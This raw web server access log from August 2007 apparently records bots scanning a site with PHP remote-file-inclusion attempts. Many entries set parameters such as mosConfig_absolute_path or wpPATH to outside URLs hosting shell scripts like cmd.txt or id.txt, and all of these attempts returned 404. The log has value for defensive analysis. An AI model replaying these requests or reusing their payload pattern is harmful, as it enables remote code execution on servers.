128.180.53.19 - - [27/Aug/2007:15:58:31 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://www.annabelles.de//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.25.165.16 - - [27/Aug/2007:15:59:41 -0700] "GET /logs/access_070813.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.25.165.16 - - [27/Aug/2007:15:59:41 -0700] "GET /logs/access.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.25.165.16 - - [27/Aug/2007:15:59:42 -0700] "GET /logs/access_070813.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.25.165.16 - - [27/Aug/2007:15:59:42 -0700] "GET /logs/access.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:15:59:46 -0700] "GET /logs/access_070521.log/wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.160.96.54 - - [27/Aug/2007:16:02:32 -0700] "GET /logs/!scanhttp://www.osrw.com/forumbak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.160.96.54 - - [27/Aug/2007:16:02:32 -0700] "GET /!scanhttp://www.osrw.com/forumbak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.32.122.210 - - [27/Aug/2007:16:03:59 -0700] "GET /logs/access.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.corvettefreak.nl/forums/style_images/bluepastel/folder_team_icons/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.122.210 - - [27/Aug/2007:16:03:59 -0700] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.corvettefreak.nl/forums/style_images/bluepastel/folder_team_icons/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.122.210 - - [27/Aug/2007:16:03:59 -0700] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.corvettefreak.nl/forums/style_images/bluepastel/folder_team_icons/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.194.149.56 - - [27/Aug/2007:16:04:36 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:05:06 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.193.237.43 - - [27/Aug/2007:16:05:06 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:05:06 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:05:06 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:05:15 -0700] "GET /logs/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:05:15 -0700] "GET /index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:05:33 -0700] "GET /logs/index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:05:34 -0700] "GET /index2.php?x=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:16:06:35 -0700] "GET /logs/access_070723.log/wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
208.99.194.216 - - [27/Aug/2007:16:06:35 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://labulle.tv/soho/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.99.194.216 - - [27/Aug/2007:16:06:35 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://labulle.tv/soho/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:16:06:35 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.73.66.165 - - [27/Aug/2007:16:06:36 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.168.40.165 - - [27/Aug/2007:16:06:47 -0700] "GET /logs/access_070618.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.artewebstudio.it/images/ijoomla/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.168.40.165 - - [27/Aug/2007:16:06:49 -0700] "GET /logs/access_070611.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.artewebstudio.it/images/ijoomla/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.168.40.165 - - [27/Aug/2007:16:06:52 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.artewebstudio.it/images/ijoomla/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.168.40.165 - - [27/Aug/2007:16:06:56 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.artewebstudio.it/images/ijoomla/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.190.161.252 - - [27/Aug/2007:16:07:56 -0700] "GET //index.php?pagina=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.86.66.26 - - [27/Aug/2007:16:07:58 -0700] "GET /logs/access_070723.log//index.php?con=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.86.66.26 - - [27/Aug/2007:16:07:59 -0700] "GET //index.php?con=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.86.66.26 - - [27/Aug/2007:16:07:59 -0700] "GET /logs//index.php?con=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:09:01 -0700] "GET /logs/displayCategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:09:01 -0700] "GET /displayCategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:16:09:43 -0700] "GET /logs/displayCategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:09:43 -0700] "GET /displayCategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
74.86.66.26 - - [27/Aug/2007:16:11:55 -0700] "GET /logs/access_070723.log//index.php?con=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.86.66.26 - - [27/Aug/2007:16:11:55 -0700] "GET //index.php?con=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.86.66.26 - - [27/Aug/2007:16:11:56 -0700] "GET /logs//index.php?con=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:13:13 -0700] "GET /logs/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:13:16 -0700] "GET /logs/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:13:16 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:13:18 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.122.210 - - [27/Aug/2007:16:14:28 -0700] "GET /logs/access_070716.log/ws/get_reminders.php?includedir=http://www.corvettefreak.nl/forums/style_images/bluepastel/folder_team_icons/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.122.210 - - [27/Aug/2007:16:14:28 -0700] "GET /ws/get_reminders.php?includedir=http://www.corvettefreak.nl/forums/style_images/bluepastel/folder_team_icons/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.122.210 - - [27/Aug/2007:16:14:28 -0700] "GET /logs/ws/get_reminders.php?includedir=http://www.corvettefreak.nl/forums/style_images/bluepastel/folder_team_icons/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:16:02 -0700] "GET /logs/access_070730.log/main.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.193.237.43 - - [27/Aug/2007:16:16:03 -0700] "GET /main.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:16:03 -0700] "GET /logs/main.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:16:08 -0700] "GET /logs/access_070730.log/main.php?id=*.phphttp://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.193.237.43 - - [27/Aug/2007:16:16:09 -0700] "GET /main.php?id=*.phphttp://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:16:09 -0700] "GET /logs/main.php?id=*.phphttp://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.149.56 - - [27/Aug/2007:16:16:31 -0700] "GET /logs/access.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.194.149.56 - - [27/Aug/2007:16:16:32 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.66.85.90 - - [27/Aug/2007:16:16:48 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.66.85.90 - - [27/Aug/2007:16:16:48 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:16:53 -0700] "GET /logs/access_070730.log/main.php?id=*.phphttp://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.66.85.90 - - [27/Aug/2007:16:16:53 -0700] "GET /logs/index2.php?=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:16:53 -0700] "GET /main.php?id=*.phphttp://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.66.85.90 - - [27/Aug/2007:16:16:53 -0700] "GET /index2.php?=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:16:54 -0700] "GET /logs/main.php?id=*.phphttp://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:19:27 -0700] "GET /logs/access_070618.log/wordtube/wordtube-button.php?wpPATH=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.193.237.43 - - [27/Aug/2007:16:19:27 -0700] "GET /logs/access_070618.log/wordtube/wordtube-button.php?wpPATH=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:19:28 -0700] "GET /logs/access_070611.log/wordtube/wordtube-button.php?wpPATH=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:19:28 -0700] "GET /logs/access_070611.log/wordtube/wordtube-button.php?wpPATH=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:19:31 -0700] "GET /logs/access_070813.log/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:19:31 -0700] "GET /upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:19:32 -0700] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:19:32 -0700] "GET /logs/access.log/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
80.74.151.80 - - [27/Aug/2007:16:20:27 -0700] "GET /logs//index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.151.80 - - [27/Aug/2007:16:20:28 -0700] "GET //index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:20:39 -0700] "GET /logs/access_070813.log/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:20:43 -0700] "GET /upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:20:44 -0700] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:20:44 -0700] "GET /logs/access.log/upgrade_album.php?GALLERY_BASEDIR=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.86.66.26 - - [27/Aug/2007:16:20:45 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.86.66.26 - - [27/Aug/2007:16:20:45 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:23:21 -0700] "GET /logs/access_070730.log/main.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:23:21 -0700] "GET /main.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.237.43 - - [27/Aug/2007:16:23:22 -0700] "GET /logs/main.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.60.212.219 - - [27/Aug/2007:16:24:31 -0700] "GET /logs/access_070430.log HTTP/1.1" 200 225841 "http://search.live.com/results.aspx?FORM=DNSAS&q=200.60.212.219" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:24:44 -0700] "GET /logs/access_070806.log/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:24:45 -0700] "GET /logs/access_070723.log/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:25:08 -0700] "GET /logs/access_070806.log/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:25:09 -0700] "GET /logs/access_070723.log/admin.remository.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:25:41 -0700] "GET /logs/access_070813.log/ihttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:25:42 -0700] "GET /ihttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:25:44 -0700] "GET /logs/access_070813.log/ihttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:25:44 -0700] "GET /ihttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:25:45 -0700] "GET /logs/ihttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:16:25:46 -0700] "GET /logs/ihttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:26:01 -0700] "GET /logs/access_070813.log/install.serverstat.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:26:02 -0700] "GET /install.serverstat.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:26:02 -0700] "GET /logs/install.serverstat.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:26:03 -0700] "GET /logs/access.log/install.serverstat.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:26:05 -0700] "GET /logs/access_070723.log/displayCategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:26:05 -0700] "GET /logs/access_070716.log/displayCategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:26:19 -0700] "GET /logs/access_070723.log/displayCategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:26:19 -0700] "GET /logs/access_070716.log/displayCategory.php?basepath=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:26:40 -0700] "GET /logs/access_070813.log/install.serverstat.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:26:41 -0700] "GET /install.serverstat.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:26:41 -0700] "GET /logs/install.serverstat.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:26:42 -0700] "GET /logs/access.log/install.serverstat.php?mosConfig_absolute_path=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.151.232.105 - - [27/Aug/2007:16:27:33 -0700] "GET /logs/index2.php?x=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.232.105 - - [27/Aug/2007:16:27:37 -0700] "GET /index2.php?x=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.232.105 - - [27/Aug/2007:16:28:28 -0700] "GET /logs/index.php?pag=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.232.105 - - [27/Aug/2007:16:28:29 -0700] "GET /index.php?pag=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.140.18.71 - - [27/Aug/2007:16:31:48 -0700] "GET /index.php?cmd=http://mr-general.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
218.38.19.40 - - [27/Aug/2007:16:32:05 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:16:32:05 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:32:12 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:32:17 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.7.201.127 - - [27/Aug/2007:16:32:35 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.Leonard0.kit.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:36:41 -0700] "GET /logs/access_070730.log/main.php?id=*.phphttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:16:36:42 -0700] "GET /main.php?id=*.phphttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
218.38.19.40 - - [27/Aug/2007:16:36:42 -0700] "GET /logs/main.php?id=*.phphttp://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.59.7.10 - - [27/Aug/2007:16:38:42 -0700] "GET /logs/access_070618.log//modules/xfsection/modify.php?dir_module=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.59.7.10 - - [27/Aug/2007:16:38:43 -0700] "GET //modules/xfsection/modify.php?dir_module=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
212.59.7.10 - - [27/Aug/2007:16:38:44 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
212.59.7.10 - - [27/Aug/2007:16:41:14 -0700] "GET /logs/access_070716.log//modules/xfsection/modify.php?dir_module=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
82.165.33.12 - - [27/Aug/2007:16:46:17 -0700] "GET /logs/access_070723.log/wordtube/wordtube-button.php?wpPATH=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
82.165.33.12 - - [27/Aug/2007:16:46:17 -0700] "GET /wordtube/wordtube-button.php?wpPATH=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
82.165.33.12 - - [27/Aug/2007:16:46:18 -0700] "GET /logs/wordtube/wordtube-button.php?wpPATH=http://www.se-unsa.org/phpmyvisites/images/pixel? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
203.151.232.105 - - [27/Aug/2007:16:48:19 -0700] "GET /logs/index.php?include=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.151.232.105 - - [27/Aug/2007:16:48:20 -0700] "GET /index.php?include=http://bhnofoco.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
81.21.72.14 - - [27/Aug/2007:16:56:48 -0700] "GET /logs/scripts.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.72.14 - - [27/Aug/2007:16:56:48 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.72.14 - - [27/Aug/2007:16:56:49 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.168.40.165 - - [27/Aug/2007:16:59:53 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.artewebstudio.it/images/ijoomla/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.168.40.165 - - [27/Aug/2007:16:59:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.artewebstudio.it/images/ijoomla/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
